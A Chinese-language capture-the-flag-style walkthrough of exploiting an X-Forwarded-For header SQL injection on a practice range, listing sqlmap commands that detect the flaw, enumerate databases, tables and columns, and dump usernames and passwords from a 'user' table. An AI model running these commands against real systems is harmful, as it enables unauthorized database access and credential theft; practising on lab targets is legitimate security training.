爆库记录(X-Forwarded-For注入漏洞实战 记录)

匿名 (未验证) 提交于 2019-12-03 00:05:01

环境位置: https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe

参考: http://www.freesion.com/article/176849949/

获取登陆地址的请求信息

 

 往请求头信息加入X-Forwarded-For:* 

一起写入 保存到本地txt文件 123.txt

 

执行sqlmap

搜索看有没有漏洞

sqlmap.py -r /Users/lucax/Desktop/123.txt

出现:(存在可以注入)

 

 

获取当前用户权限

sqlmap.py -r /Users/lucax/Desktop/123.txt --current-user

 

 

获取当前数据库库名

sqlmap.py -r /Users/lucax/Desktop/123.txt --dbs

 

 

 

获取数据库表名

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar --tables

 

 

获取表里面的字段名

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user --columns

 

 

获取字段对应的值

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user -C id,username,password --dump

 

 

标签
desktop
sqlmap
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!